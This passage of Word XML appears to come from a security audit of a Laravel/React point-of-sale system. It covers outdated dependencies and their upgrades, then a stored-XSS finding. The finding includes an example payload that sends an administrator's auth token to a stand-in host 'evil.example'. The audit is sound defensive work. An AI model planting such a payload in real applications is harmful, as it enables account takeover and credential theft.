        <w:spacing w:after="166" w:before="280" w:line="265"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A06:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-1104</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CWE-937</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High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">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Backend — 41 advisories across 13 packages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (12 high, 24 medium, 4 low): guzzle (9), psr7 (4), commonmark (12), laravel/framework (3), symfony/mime, routing, yaml, mailer, process, http-foundation, polyfill-intl-idn, phpunit, psysh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">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Root cause: laravel/framework pinned to ^10.10 . </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">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Laravel 10's security support ended 2025-02-04</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the project ran on PHP ^8.1 , whose support ended 2025-12-31. Both framework and runtime were past end of life.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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turned out not to be a theoretical concern. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Composer now refuses to install any 10.x release at all:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">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Root composer.json requires laravel/framework ^10.10, found</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">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laravel/framework[v10.10.0, ..., v10.50.3] but these were not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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loaded, because they are affected by security advisories</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">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There is therefore no "pin to the latest 10.x patch" option. Our plan had listed the major upgrade as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deferred</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; the evidence made it mandatory, and we promoted it to a fix.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">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Upgraded to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laravel 12.69.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Sanctum 4.3.3, PHP floor ^8.2 , PHPUnit 11. Compatibility was checked first: no migration uses -&gt;change() (which needed Doctrine DBAL, removed in 11), the classic bootstrap/app.php and Kernel.php structure that Laravel 12 still supports for upgraded applications is retained, and no removed helper is referenced. One change was required. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">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Sanctum 4 no longer auto-loads its personal_access_tokens migration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it is now published into the application; without it every login fails.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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Frontend: 23 advisories</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2 critical, 14 high). Two were reachable from user input:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="232" w:firstLine="0"/>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xlsx@0.18.5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : CVE-2023-30533 (prototype pollution in sheet_to_json ) and CVE-2024-22363 (ReDoS). Reachable via GrnAdjust.jsx:1222 , which validates </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nothing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before calling XLSX.read() . npm audit fix cannot resolve this: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">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SheetJS no longer publishes to npm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so the registry's newest version is the vulnerable one. Repointed to the vendor's own distribution at 0.20.3 .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="364" w:right="16" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="467886"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">jspdf@3.0.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :  10 advisories rated critical including PDF injection allowing arbitrary JavaScript. Reachable because every exported PDF is built from unescaped server strings (V-13). Upgraded to ^4.2.1 after confirming jspdfautotable@5 already declares peerDependencies {"jspdf":"^2 || ^3 || ^4"} and that only APIs stable across the major are used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> composer audit → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No security vulnerability advisories found</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (41 → 0). npm audit → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">found 0 vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (23 → 0). Both suites and both builds pass.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">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Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">V-13 · Stored XSS in the receipt printer → administrator token theft</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="173" w:before="280" w:line="259"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A03:2021 Injection · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-79</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CVSS 8.8</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Critical</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">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Evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> There was no HTML escaping anywhere in the frontend. A repository-wide search for escapeHtml|sanitiz|DOMPurify over src/ returned one hit, and it was an unrelated encodeURIComponent .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">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React escapes everything it renders, so the JSX was never the problem. Receipts and reports are </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendered by React they are assembled as template strings and handed to document.write() in a new window, at seven call sites including CreateInvoice.jsx:1751 and SalesHistory.jsx:1011 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">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Those templates interpolated server data raw: customer name, customer phone, cashier name, department name and address, product name, and the free-text invoice note.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">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And the one function that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">looked</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> like a sanitiser was a no-op:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">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src/pages/Invoice/CreateInvoice.jsx:1299</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">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const cleanProductName = (productName) =&gt; {</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">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if (!productName) return "";</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">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Remove everything inside parentheses including the parentheses</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">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return productName            // &lt;- that is the entire function</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">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Its own comment describes a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.replace()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is not there. This made it the most dangerous line in the file: a reviewer seeing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cleanProductName(...)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the interpolation site would reasonably assume the value had been handled.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">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Exploit chain.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cashier saves a customer named or types into an invoice note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="182"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&lt;img src=x onerror="fetch('https://evil.example/?t='+localStorage.authToken)"&gt;Nothing happens at that point. The payload fires when an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> later prints that invoice from Sales History. It executes in a same-origin window and exfiltrates the admin's bearer token, which the application kept in localStorage where script can read it (V-16) and which never expired (V-06).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">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Stored XSS to full administrator account takeover, triggered by a routine business action, requiring only the ability to type a customer's name. Product names imported from a spreadsheet (V-17) reach the same sink.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
